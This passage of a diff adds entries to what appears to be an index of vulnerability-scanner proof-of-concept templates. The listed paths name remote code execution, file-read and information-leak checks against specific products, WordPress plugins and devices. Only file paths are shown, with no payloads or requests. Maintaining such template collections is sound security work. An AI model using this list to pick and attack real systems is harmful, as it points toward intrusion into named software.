+./poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml ./poc/other/connect-proxy.yaml ./poc/other/connect.yaml ./poc/other/connect_secure.yaml @@ -91384,6 +91613,7 @@ ./poc/other/craft-blog-236bed5b5a49a6173251e991d6ca44d1.yaml ./poc/other/craft-blog-d2a46afd6d61289094ec49e6cf79a7c7.yaml ./poc/other/craft-blog.yaml +./poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml ./poc/other/crafthemes-demo-import-c9afed6fd882eb289857b169e53bcf2b.yaml ./poc/other/crafthemes-demo-import.yaml ./poc/other/craw-data-a12ef7ae6072663c7d8126b335e31950.yaml @@ -92287,6 +92517,7 @@ ./poc/other/deshang-dsmall.yaml ./poc/other/design-approval-system.yaml ./poc/other/designer-7fce07176e5a99557088287ca81287a3.yaml +./poc/other/designer.yaml ./poc/other/designexo-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/designexo-7882c02d98b5026004752dc9f1ff36bf.yaml ./poc/other/designexo-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -93044,6 +93275,7 @@ ./poc/other/ds_store-7119.yaml ./poc/other/ds_store.yaml ./poc/other/dsdownloadlist-563c0ddc96003b5bd029f38391d35cf2.yaml +./poc/other/dsdownloadlist.yaml ./poc/other/dse855.yaml ./poc/other/dsgvo-youtube-ab2720de0d52a7fa9590416e9523d9f9.yaml ./poc/other/dsgvo-youtube.yaml @@ -94821,6 +95053,7 @@ ./poc/other/evarisk-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/evarisk-plugin.yaml ./poc/other/evarisk.yaml +./poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml ./poc/other/event-277e8d56fcc68c4b904b4c6797f4ff1a.yaml ./poc/other/event-calendar-wd-69b87bae465fb82052727592fcbbe735.yaml ./poc/other/event-calendar-wd-877cd82fe3e9375676ea8b83397686a1.yaml @@ -95551,6 +95784,7 @@ ./poc/other/fat-rat-collect.yaml ./poc/other/fat-services-booking-563fc2c8504016145619f4efef5821c6.yaml ./poc/other/fat-services-booking-b49b9540b1d61d0bb6646887776106fb.yaml +./poc/other/fat-services-booking.yaml ./poc/other/fatal-error-notify-4a20fe7df5a09e585c3fd29c87c93761.yaml ./poc/other/fatal-error-notify-beeb4a2f62cdc2511279a3069cd288ec.yaml ./poc/other/fatal-error-notify-c90c028a9c10e24d0650366923ed951b.yaml @@ -96178,6 +96412,7 @@ ./poc/other/fluentform-4d296b89af0753bd8b0006f1d8fb0707.yaml ./poc/other/fluentform-5a4f1d1335206be59253794aca5ea37a.yaml ./poc/other/fluentform-5afefafeffe78d68ca3029397b2c2a37.yaml +./poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml ./poc/other/fluentform-74266f76b31cec8437470fd5003d94c7.yaml ./poc/other/fluentform-7a194261443314036f826412dad99fb1.yaml ./poc/other/fluentform-89fc5d9942562cda921b9b436fa13433.yaml @@ -96868,6 +97103,7 @@ ./poc/other/full-page-blog-designer-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/full-page-blog-designer.yaml ./poc/other/full-screen-page-background-image-slideshow-6def5bf7385a589549cc6977b19eb2ae.yaml +./poc/other/full-screen-page-background-image-slideshow.yaml ./poc/other/full-site-editing-24836cca8d46e399082ff66df1b9f2f5.yaml ./poc/other/full-site-editing.yaml ./poc/other/fullscreen-galleria-667d8a4d3d1ada2f02cda7769b0c26df.yaml @@ -97158,6 +97394,7 @@ ./poc/other/ganglia-xml-grid-monitor-7574.yaml ./poc/other/ganglia-xml-grid-monitor.yaml ./poc/other/ganglia.yaml +./poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml ./poc/other/gantry-26331f1e23aa3cae2c716a0d19223272.yaml ./poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml ./poc/other/gantry-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -97356,6 +97593,7 @@ ./poc/other/get-hotfix.yaml ./poc/other/get-iam-users.yaml ./poc/other/get-override-sni.yaml +./poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml ./poc/other/get-query-string.yaml ./poc/other/get-site-to-phone-by-qr-code-53f9f187ffc31e706ad6ef27544d8f05.yaml ./poc/other/get-site-to-phone-by-qr-code.yaml @@ -97622,6 +97860,7 @@ ./poc/other/globe-gateway-e4.yaml ./poc/other/glodon-console.yaml ./poc/other/glodon-linkworks-getuserxml4geps-infoleak.yaml +./poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml ./poc/other/gloriatv.yaml ./poc/other/glorious-services-support-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/glorious-services-support.yaml @@ -97655,6 +97894,7 @@ ./poc/other/gmap-embed.yaml ./poc/other/gmap-point-list.yaml ./poc/other/gmw-premium-settings-dd2bed6814a3bf62f3d77a7f20807d63.yaml +./poc/other/gmw-premium-settings.yaml ./poc/other/gn-publisher-ed64a3bb268d993879bfe6d851cf3187.yaml ./poc/other/gn-publisher.yaml ./poc/other/gnome-extensions.yaml @@ -98293,6 +98533,7 @@ ./poc/other/hello-elementor-4871f7fef9821ad7021876ca49006f78.yaml ./poc/other/hello-elementor.yaml ./poc/other/hello-in-all-languages-b021d6b8c28aeac89d4ee418f75211e9.yaml +./poc/other/hello-in-all-languages.yaml ./poc/other/hello-world-d231240ada94c5c8cbcc13bfa66f2525.yaml ./poc/other/hello-world.yaml ./poc/other/helloprint-34e41f309c98caf99baeb7f290643ca1.yaml @@ -98431,6 +98672,7 @@ ./poc/other/hitron-technologies-7962.yaml ./poc/other/hitron-technologies.yaml ./poc/other/hits-counter-cc939d1b6fabefd87c8b2ff2ea159694.yaml +./poc/other/hits-counter.yaml ./poc/other/hitsteps-visitor-manager-a4f14bcf46b90bf05fd86abc01d72e3e.yaml ./poc/other/hitsteps-visitor-manager-fc2fce71ebba70ebb2a3e464a40cd489.yaml ./poc/other/hitsteps-visitor-manager.yaml @@ -99336,6 +99578,7 @@ ./poc/other/imperial-fairytale-theme.yaml ./poc/other/imperial-fairytale.yaml ./poc/other/import-csv-files.yaml +./poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml ./poc/other/import-external-images-9273f54c8ffd0f68faff3d0f499be1c5.yaml ./poc/other/import-external-images.yaml ./poc/other/import-legacy-media-67f149250550d8d33d307cab4d57c82b.yaml @@ -100245,11 +100488,13 @@ ./poc/other/jigsaw.yaml ./poc/other/jinhe-oa-c6-download-file-read.yaml ./poc/other/jinheOA-c6-Anyfile-Read.yaml +./poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml ./poc/other/jinher-oa-c6-download-file-read.yaml ./poc/other/jinher_OA_fileread.yaml ./poc/other/jitsi-meet-8342.yaml ./poc/other/jitsi-meet-8343.yaml ./poc/other/jitsi-meet.yaml +./poc/other/jiusi-oa-dl-fileread.yaml ./poc/other/jiusi-oa.yaml ./poc/other/jiusi_oa_wap_fileread.yaml ./poc/other/jive-sbs.yaml @@ -100400,6 +100645,7 @@ ./poc/other/jquery-collapse-o-matic-de7fa514ed9b21773bf9bc851ef2b923.yaml ./poc/other/jquery-collapse-o-matic.yaml ./poc/other/jquery-manager-3367ea01f2088951cb342fb251d528dc.yaml +./poc/other/jquery-manager.yaml ./poc/other/jquery-news-ticker-69744f50cb3b95e3866ba8aeb7605b95.yaml ./poc/other/jquery-news-ticker-c49c40f42bc43c6794ed78edc107a82d.yaml ./poc/other/jquery-news-ticker.yaml @@ -100710,6 +100956,7 @@ ./poc/other/kingdee-oa-apusic-dirlist.yaml ./poc/other/kingdee-oa-serverfile-dirlist.yaml ./poc/other/kingdee.yaml +./poc/other/kingdee_eas_pdfViewLocal_fileread.yaml ./poc/other/kingdee产品.yaml ./poc/other/kingosoft.yaml ./poc/other/kings-tab-slider-87759ecd3c5abd20fb071fecef1b0643.yaml @@ -100722,6 +100969,7 @@ ./poc/other/kingsoft-v8-fileread.yaml ./poc/other/kingsoft-v8-get-file-content-file-read.yaml ./poc/other/kingsoft_antivirus.yaml +./poc/other/kingview-KingPortal-img-fileread.yaml ./poc/other/kinpan-wechat-getsysteminfo-fileread.yaml ./poc/other/kio_firmware.yaml ./poc/other/kioken-blocks-ff9293ba28748efa2ab9a2fe77385468.yaml @@ -100806,6 +101054,7 @@ ./poc/other/ko-fi-button-9325aa24d072619f5651560e247384bb.yaml ./poc/other/ko-fi-button.yaml ./poc/other/ko-fi.yaml +./poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml ./poc/other/kodak-network-panel.yaml ./poc/other/kodcloud-system.yaml ./poc/other/kodex-posts-likes-45e6993ba544590f694f6722fa3e7ded.yaml @@ -100865,6 +101114,7 @@ ./poc/other/kraken-image-optimizer-8ef92c244ea084d34d3e77779f862441.yaml ./poc/other/kraken-image-optimizer-e178ea8a276e641fa36d4631642d4084.yaml ./poc/other/kraken-image-optimizer.yaml +./poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml ./poc/other/kuaipu-m6.yaml ./poc/other/kube-state-metrics.yaml ./poc/other/kubelet-healthz-8518.yaml @@ -101790,6 +102040,7 @@ ./poc/other/logo-slider.yaml ./poc/other/logs-de-connexion-d7d23b155dfaa3a988d72e6127ed152e.yaml ./poc/other/logs-de-connexion-f85b384f28b3064f6cddcd3aea6c849b.yaml +./poc/other/logs-de-connexion.yaml ./poc/other/logsign-siem.yaml ./poc/other/lokalise.yaml ./poc/other/lokalyze-call-now-fc31f34f1e7eb5532b8cee2cef1220e7.yaml @@ -104495,6 +104746,7 @@ ./poc/other/newsmag-e9d5168a26b888c732e45e101b7446e7.yaml ./poc/other/newsmag-f3f203d9ab101f9d04ccf12ec6b5d164.yaml ./poc/other/newsmag.yaml +./poc/other/newsmanapp.yaml ./poc/other/newsmash-40bc3abb5400677523e2ad7a6261fa5e.yaml ./poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml ./poc/other/newsmash.yaml @@ -104516,6 +104768,7 @@ ./poc/other/newspack-newsletters-4f9999690c698581a845ad28f4a49bf8.yaml ./poc/other/newspack-newsletters.yaml ./poc/other/newspack-plugin-9379b5458873ca8a838af45b061cf132.yaml +./poc/other/newspack-plugin.yaml ./poc/other/newspack-popups-a34c5e958edc8f07b0a33b04a4a7ac46.yaml ./poc/other/newspack-popups.yaml ./poc/other/newspaper-00f6665d6f319be9e02a942aa6e540c2.yaml @@ -104843,6 +105096,7 @@ ./poc/other/note.yaml ./poc/other/notebook.yaml ./poc/other/notibar-6a67eeac174695863f49cd0d3c96e4de.yaml +./poc/other/notibar.yaml ./poc/other/notice-bar-fd5c26d13188a474f8a36443321259dc.yaml ./poc/other/notice-bar.yaml ./poc/other/notice-board-cc874ba3ea9c2c7947f3b19596262c88.yaml @@ -105207,6 +105461,7 @@ ./poc/other/oopspam-anti-spam-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/oopspam-anti-spam.yaml ./poc/other/ootb-openstreetmap-ebbdd7982d7cfbc5d8fdcc7fb1338a5e.yaml +./poc/other/ootb-openstreetmap.yaml ./poc/other/op5-monitor.yaml ./poc/other/opal-estate-0dcb54302d1cbc14744921bfe49d6ec9.yaml ./poc/other/opal-estate-83c55a4f4dacc2f4f75cffb02185b669.yaml @@ -106508,6 +106763,7 @@ ./poc/other/plainview-activity-monitor.yaml ./poc/other/planet-estream-panel.yaml ./poc/other/planning-center-online-giving-2b8dc9f317fc89f600c6ff394da3f60b.yaml +./poc/other/planning-center-online-giving.yaml ./poc/other/plasma-malware.yaml ./poc/other/platform-494affd308ccb8e7d64ed1c53e59c3e9.yaml ./poc/other/platform-7b06cc5209762854414b3c68c84c38ec.yaml @@ -106580,6 +106836,7 @@ ./poc/other/plesk-stat.yaml ./poc/other/plexx-elementor-extension-bc97d41674ed9373912c496ad23df944.yaml ./poc/other/plexx-elementor-extension.yaml +./poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml ./poc/other/plezi-4a80cd5a954b8f2bb72aeed6f12b185b.yaml ./poc/other/plezi.yaml ./poc/other/plg_novana-1c2cea013210e5c90b176a13485e2663.yaml @@ -107174,6 +107431,7 @@ ./poc/other/post-to-csv-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/post-to-csv-plugin.yaml ./poc/other/post-to-csv.yaml +./poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml ./poc/other/post-type-archive-mapping-2048e7d39b225ecdc11a2ee2d7255ab3.yaml ./poc/other/post-type-archive-mapping-ee3c52d95babeb4141d73dea29ec18e7.yaml ./poc/other/post-type-archive-mapping.yaml @@ -107189,6 +107447,7 @@ ./poc/other/post-type-x-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/post-type-x-plugin.yaml ./poc/other/post-type-x.yaml +./poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml ./poc/other/post-types-order.yaml ./poc/other/post-views-24abd907ffd64580d7c943b12c674d4c.yaml ./poc/other/post-views-c6d12eac9a2ed5430c292a57d46c13c2.yaml @@ -107251,6 +107510,7 @@ ./poc/other/postmessage-tracker.yaml ./poc/other/postmessage.yaml ./poc/other/postnews.yaml +./poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml ./poc/other/posts-and-users-stats-0ab172d4ca9582c8fe74d25d5316a728.yaml ./poc/other/posts-and-users-stats.yaml ./poc/other/posts-filter.yaml @@ -107517,6 +107777,7 @@ ./poc/other/prime-mover-7be4a5d85c0be6b79c9fd75d603a61da.yaml ./poc/other/prime-mover.yaml ./poc/other/primer-mydata-375188c0b0a50f100d36b48b3521edda.yaml +./poc/other/primer-mydata.yaml ./poc/other/print-my-blog-07d0b9eba83ac3bc99e70879809b2161.yaml ./poc/other/print-my-blog-0d60b839fe53b91ff4cd23a37a41ac2d.yaml ./poc/other/print-my-blog-16b2944c04b2e609c30ed7f0804ad8ff.yaml @@ -107669,6 +107930,7 @@ ./poc/other/production-logs-9664.yaml ./poc/other/production-logs-9665.yaml ./poc/other/production-logs.yaml +./poc/other/products-stock-manager-with-excel.yaml ./poc/other/profense-firewall.yaml ./poc/other/profile-builder-06648f9e075615ca43176d0be5873808.yaml ./poc/other/profile-builder-09b09edeeb14a032955a996c9b7890ff.yaml @@ -107818,6 +108080,7 @@ ./poc/other/property-hive-mortgage-calculator-c760bbdc9bdcea05982c5bd90d16aa7b.yaml ./poc/other/property-hive-mortgage-calculator.yaml ./poc/other/property-hive-stamp-duty-calculator-16a9af1f4a5d2ccf56de55248353c80f.yaml +./poc/other/property-hive-stamp-duty-calculator.yaml ./poc/other/propertyhive-037af55d6e8601eb539d4a293f2c7429.yaml ./poc/other/propertyhive-213fa11c4bf7a8da59d186bd55b54ba6.yaml ./poc/other/propertyhive-2960a525cbf962ede729aef65425d76d.yaml @@ -109375,6 +109638,7 @@ ./poc/other/revslider.yaml ./poc/other/revy-495c6c691b0c18d8639b2352902ab78e.yaml ./poc/other/revy-97d9157afa2e36b24297da5e222a765b.yaml +./poc/other/revy.yaml ./poc/other/rezgo-26bcf3f897bab277c32fe85f1493ee87.yaml ./poc/other/rezgo-58d7619a08af07091de0a1f004b3ffbf.yaml ./poc/other/rezgo-97ad3e6e2bcf0df0bbed78fdfd1954d0.yaml @@ -109648,6 +109912,7 @@ ./poc/other/royalevent-management-panel.yaml ./poc/other/rpcbind-portmapper.yaml ./poc/other/rrdevs-for-elementor-205fba8fcfa128a4dd45c5c816b0bc58.yaml +./poc/other/rrdevs-for-elementor.yaml ./poc/other/rs-members-87dc2cb96f427a4fa87cb5cd585347cf.yaml ./poc/other/rs-members.yaml ./poc/other/rsa-self-service-9910.yaml @@ -110781,6 +111046,7 @@ ./poc/other/shortcode-bootstrap-visuals.yaml ./poc/other/shortcode-collection-1a24724444a0ce58a48ac7d26c93a67e.yaml ./poc/other/shortcode-collection.yaml +./poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml ./poc/other/shortcode-factory-bb8c7d13ad5dab028e9d0d3a3d2621e1.yaml ./poc/other/shortcode-factory.yaml ./poc/other/shortcode-for-current-date-85546a26d851f796e7037706c76d8989.yaml @@ -111219,6 +111485,7 @@ ./poc/other/simple-local-avatars-928d72ad44844b77d7135481b3a08e1d.yaml ./poc/other/simple-local-avatars-a6c25ebb693343456025e35b71df1fed.yaml ./poc/other/simple-local-avatars.yaml +./poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml ./poc/other/simple-long-form-3cc0cac5f345be7226ac380ec33c94e0.yaml ./poc/other/simple-long-form.yaml ./poc/other/simple-mail-address-encoder.yaml @@ -111924,6 +112191,7 @@ ./poc/other/smart-mockups-b1f443189eb688858fd0760beeec94dd.yaml ./poc/other/smart-mockups.yaml ./poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml +./poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml ./poc/other/smart-popup-blaster.yaml ./poc/other/smart-recent-posts-widget-d88f3f455f89003fa5734c525e70e76b.yaml ./poc/other/smart-recent-posts-widget.yaml @@ -113263,6 +113531,7 @@ ./poc/other/svg-complete-9a00f88d5bc565ed948caf11dc5530b8.yaml ./poc/other/svg-complete.yaml ./poc/other/svg-flags-lite.yaml +./poc/other/svg-shortcode.yaml ./poc/other/svg-support-10450f9513d12ac69ea3bb6965c90ce1.yaml ./poc/other/svg-support-2111a4f5665d081b6a00c0712b17ce49.yaml ./poc/other/svg-support-8737608367f730b35c2f865cc5227ba0.yaml @@ -113310,6 +113579,7 @@ ./poc/other/swatchly-93343aa0a2403cba1031441b0dd98003.yaml ./poc/other/swatchly.yaml ./poc/other/sweetdate-e5542b1b90e04f838a674478f1ae9a52.yaml +./poc/other/sweetdate.yaml ./poc/other/sweetrice.yaml ./poc/other/swift-framework-1c90a46c7aa619f2f432c73c82e79d4f.yaml ./poc/other/swift-framework-30d3f5776ed35230993fad52196a3d03.yaml @@ -113498,6 +113768,7 @@ ./poc/other/taboola.yaml ./poc/other/tabs-for-visual-composer-7c24bcf8b3fe76d313191f1003581a90.yaml ./poc/other/tabs-for-visual-composer.yaml +./poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml ./poc/other/tabs-pro-07c3e9f28b3b9a38cbe150ab5e295ae3.yaml ./poc/other/tabs-pro.yaml ./poc/other/tabs-responsive-b0eeadcb7d7ab536f40c20fe22b3eecc.yaml @@ -113611,6 +113882,7 @@ ./poc/other/tbk-dvr.yaml ./poc/other/tc-team-members-bd0b9b57a9e173e1e14b3ac0d64104a6.yaml ./poc/other/tc-team-members.yaml +./poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml ./poc/other/tcexam.yaml ./poc/other/tcp.yaml ./poc/other/td-cloud-library-1c4748f99f4bb0e2e425c3b000b9c0fc.yaml @@ -113950,6 +114222,7 @@ ./poc/other/the-pack-addon-9d65c45870447c8e1f574c9405c1c538.yaml ./poc/other/the-pack-addon-ec4204d732428a733d159f17edf497a0.yaml ./poc/other/the-pack-addon.yaml +./poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml ./poc/other/the-plus-addons-for-block-editor-3fac6ec605435f133e033d04209d4a06.yaml ./poc/other/the-plus-addons-for-block-editor-403b4c18c02de4a160946d81932cebc9.yaml ./poc/other/the-plus-addons-for-block-editor-781fc65c192e8902dacabb03e295f0ff.yaml @@ -114156,6 +114429,7 @@ ./poc/other/themify-shortcodes-4124d8eed93cc84547a536e1c9d94b5f.yaml ./poc/other/themify-shortcodes.yaml ./poc/other/themify-store-locator-e1393938516ee9ae32cd5a606ad5b4ae.yaml +./poc/other/themify-store-locator.yaml ./poc/other/themify-ultra-5bc95c45748a3cd254e9770f26f620e3.yaml ./poc/other/themify-ultra-6e81b62d05c5b213c75bcd56b829bf41.yaml ./poc/other/themify-ultra-719858a7657f5c00d8b2f152c226b96c.yaml @@ -114295,6 +114569,7 @@ ./poc/other/tianqing-info-leak-10765.yaml ./poc/other/tianqing-info-leak.yaml ./poc/other/tianqing-info-leak.yml +./poc/other/tianrongxin-TopSAG-download-download.yaml ./poc/other/tianyang-bpm-system.yaml ./poc/other/tibco-spotfire-panel.yaml ./poc/other/ticker-ultimate-7851c267c5129958224bd7b0d064e1e0.yaml @@ -114304,6 +114579,7 @@ ./poc/other/tickera-event-ticketing-system-3f231e7816388b1fe9e5517814166488.yaml ./poc/other/tickera-event-ticketing-system-44efbffc26c955fed37363f5648f1c78.yaml ./poc/other/tickera-event-ticketing-system-54b8e1a7f0e6f3064866cf634da7560f.yaml +./poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml ./poc/other/tickera-event-ticketing-system-a4f1c86e3f8fdc5a0b0c583f5408977f.yaml ./poc/other/tickera-event-ticketing-system-d6d78415ab4cbc0ee457ea8ace304473.yaml ./poc/other/tickera-event-ticketing-system-f6c669de17f32256469c29f894a188e9.yaml @@ -115668,6 +115944,7 @@ ./poc/other/unlimited-popups-plugin.yaml ./poc/other/unlimited-popups.yaml ./poc/other/unlock-addons-for-elementor-3a1552c6c63a6565750f219a6bc5b9e2.yaml +./poc/other/unlock-addons-for-elementor.yaml ./poc/other/unnamed-481779fee29d45847b5ad994dd1bc157.yaml ./poc/other/unnamed-se-481779fee29d45847b5ad994dd1bc157.yaml ./poc/other/unnamed-se.yaml @@ -116557,6 +116834,7 @@ ./poc/other/visualizer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/visualizer-plugin.yaml ./poc/other/visualizer.yaml +./poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml ./poc/other/visualstudio.yaml ./poc/other/visualsvn-server.yaml ./poc/other/visualware-myconnection-server.yaml @@ -116835,6 +117113,7 @@ ./poc/other/wangguard.yaml ./poc/other/wangshen-file.yaml ./poc/other/wangyu-ssl-vpn.yaml +./poc/other/wangyuxingyun_vpn_client_filedownload.yaml ./poc/other/wanhu-download-old-file-read.yaml ./poc/other/wanhu-ezoffice-download-fileread.yaml ./poc/other/wanhu-ezoffice-download-old-filedownload.yaml @@ -117577,6 +117856,7 @@ ./poc/other/woo-cart-abandonment-recovery-7dadc2d2ae314fd7bd464abf2969a4ea.yaml ./poc/other/woo-cart-abandonment-recovery.yaml ./poc/other/woo-cart-all-in-one.yaml +./poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml ./poc/other/woo-category-slider-by-pluginever-14963541d2314ab58423512ed4bb3c81.yaml ./poc/other/woo-category-slider-by-pluginever-55347e9ac58126992d50d45693e54288.yaml ./poc/other/woo-category-slider-by-pluginever-621a86ac69fc43f58c97e1a34ee9115f.yaml @@ -117817,6 +118097,7 @@ ./poc/other/woo-product-design.yaml ./poc/other/woo-product-enquiry-b4526b276b3e2e7c0402b23d28757087.yaml ./poc/other/woo-product-enquiry.yaml +./poc/other/woo-product-excel-importer.yaml ./poc/other/woo-product-feed-pro-05841ed67452b0e539ead75c4b08efdc.yaml ./poc/other/woo-product-feed-pro-34a31aab7c05fc1a6c61c6a8ed5fc249.yaml ./poc/other/woo-product-feed-pro-375f6b2e208ed8fa03b50c0612a67cf9.yaml @@ -118292,6 +118573,7 @@ ./poc/other/worth-the-read-621a86ac69fc43f58c97e1a34ee9115f.yaml ./poc/other/worth-the-read.yaml ./poc/other/wosign-ssl-cert.yaml +./poc/other/wot-elementor-widgets.yaml ./poc/other/wowhead.yaml ./poc/other/wowonder-installer.yaml ./poc/other/wowrestro-5b0f70e6bd85e50d3573977e5e12a5ee.yaml @@ -118721,12 +119003,14 @@ ./poc/other/yml-for-yandex-market-f2c47051ee26491b6f34209d86d4bf15.yaml ./poc/other/yml-for-yandex-market-f4f7110eac52dea3f609dd027787a854.yaml ./poc/other/yml-for-yandex-market.yaml +./poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml ./poc/other/yongyou-ELTextFile.yaml ./poc/other/yongyou-changjietong-EFI.yaml ./poc/other/yongyou-eltextfile.yaml ./poc/other/yongyou-fileRead.yaml ./poc/other/yongyou-u8-crm-fileread-getemaildata.yaml ./poc/other/yonyou nc协同-oa管理软件 v5.1sp1.yaml +./poc/other/yonyou-UFIDA-NC-download-fileread.yaml ./poc/other/yonyou-chanjet-tplus-downloadproxy-filedownload.yaml ./poc/other/yonyou-chanjet-tplus-getdecallusers-infoleak.yaml ./poc/other/yonyou-chanjet-tplus-read-file.yaml @@ -120204,6 +120488,8 @@ ./poc/remote_code_execution/CVE_RCE2-1.yaml ./poc/remote_code_execution/ClusterEngine-sysShell-rce.yaml ./poc/remote_code_execution/D-Link-rce-CVE-2024-3273.yaml +./poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml +./poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml ./poc/remote_code_execution/DedeCMS-common.func.php-RCE.yaml ./poc/remote_code_execution/Digital-Signage-rce.yaml ./poc/remote_code_execution/E-Cology-rce.yaml @@ -120426,6 +120712,7 @@ ./poc/remote_code_execution/appmaker-woocommerce-mobile-app-manager-11da82ad472a7a1feeb0be4f66208210.yaml ./poc/remote_code_execution/appmaker-woocommerce-mobile-app-manager.yaml ./poc/remote_code_execution/ar-for-woocommerce-c4de0b2f08459711f843283164b2de85.yaml +./poc/remote_code_execution/ar-for-woocommerce.yaml ./poc/remote_code_execution/aramex-shipping-woocommerce-1e2ec7b5ad1bde5997d8381a3b49e6ed.yaml ./poc/remote_code_execution/aramex-shipping-woocommerce.yaml ./poc/remote_code_execution/arbitrary-file-thinkphp-lang-rce.yaml @@ -120748,6 +121035,7 @@ ./poc/remote_code_execution/customize-my-account-for-woocommerce.yaml ./poc/remote_code_execution/cve_rce2-1(1).yaml ./poc/remote_code_execution/cyberpanel-rce.yaml +./poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml ./poc/remote_code_execution/dahua-dss-zhihuixiaoyuan-s2_45-rce.yaml ./poc/remote_code_execution/dahua-eims-capture-handle-rce.yaml ./poc/remote_code_execution/dahua-icc-fastjson-rce.yaml @@ -121152,6 +121440,7 @@ ./poc/remote_code_execution/friendstore-for-woocommerce-f6c40d91764a7040df004249061d5f1d.yaml ./poc/remote_code_execution/friendstore-for-woocommerce.yaml ./poc/remote_code_execution/fuzz-reflection-rce.yaml +./poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml ./poc/remote_code_execution/geoserver-rce-cve-2024-30641.yaml ./poc/remote_code_execution/geoserver_rce_exploit.yaml ./poc/remote_code_execution/gestpay-for-woocommerce-3e97556eeeeeda9a3c8865da4f61e8c3.yaml @@ -121210,6 +121499,7 @@ ./poc/remote_code_execution/h3c-imc-rce.yml ./poc/remote_code_execution/h3c_imc_rce.yaml ./poc/remote_code_execution/hadoop-unauth-rce.yaml +./poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml ./poc/remote_code_execution/hanta-rce.yaml ./poc/remote_code_execution/hashicorp-consul-rce-7890.yaml ./poc/remote_code_execution/hashicorp-consul-rce-7891.yaml @@ -121345,6 +121635,7 @@ ./poc/remote_code_execution/kingdee_apusic_loadtree_rce.yaml ./poc/remote_code_execution/kingdee_devreportservice_rce.yaml ./poc/remote_code_execution/kingdee_dynamicform_rce.yaml +./poc/remote_code_execution/kingdee_eas_apputil_rce.yaml ./poc/remote_code_execution/kingdee_getbusinessobjectdata_rce.yaml ./poc/remote_code_execution/kingdee_k3_cloud_kdsvc_rce.yaml ./poc/remote_code_execution/kingdee_k3_cloud_saveuserassport_rce.yaml @@ -121460,6 +121751,7 @@ ./poc/remote_code_execution/mcafee-epo-rce.yaml ./poc/remote_code_execution/mediaburst-ecommerce-sms-notifications-6e9ad46ba7b82908596d92a906a7c328.yaml ./poc/remote_code_execution/mediaburst-ecommerce-sms-notifications.yaml +./poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml ./poc/remote_code_execution/membership-for-woocommerce-a840ced418f0a4427fd2be21dafcbb52.yaml ./poc/remote_code_execution/membership-for-woocommerce.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml @@ -121473,6 +121765,7 @@ ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce-29c59921f159dd1fd640d027a39c2496.yaml ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce.yaml ./poc/remote_code_execution/min-and-max-quantity-for-woocommerce-0f5a6c102396442ad361086f6c37c680.yaml +./poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml ./poc/remote_code_execution/mingyu_rce.yaml ./poc/remote_code_execution/minimum-purchase-for-woocommerce-e4f1cc5bd593337093a7edcab950e56f.yaml ./poc/remote_code_execution/minimum-purchase-for-woocommerce.yaml @@ -121580,6 +121873,7 @@ ./poc/remote_code_execution/ni-woocommerce-custom-order-status-c82f3bfb0227cd93471796cd6ad7019e.yaml ./poc/remote_code_execution/ni-woocommerce-custom-order-status.yaml ./poc/remote_code_execution/ni-woocommerce-order-export-bc1c0fd81e2a3ec59a3d7bcd78b83be3.yaml +./poc/remote_code_execution/ni-woocommerce-order-export.yaml ./poc/remote_code_execution/ni-woocommerce-sales-report-8a31f44eb6f99b33cb133332f49866d6.yaml ./poc/remote_code_execution/ni-woocommerce-sales-report.yaml ./poc/remote_code_execution/no-captcha-recaptcha-for-woocommerce-01246388934c238995ce6993f2a170ff.yaml @@ -121883,6 +122177,7 @@ ./poc/remote_code_execution/printful-shipping-for-woocommerce.yaml ./poc/remote_code_execution/prodigy-commerce-89dae14b2ed2d25b5a5c7aae20575f1c.yaml 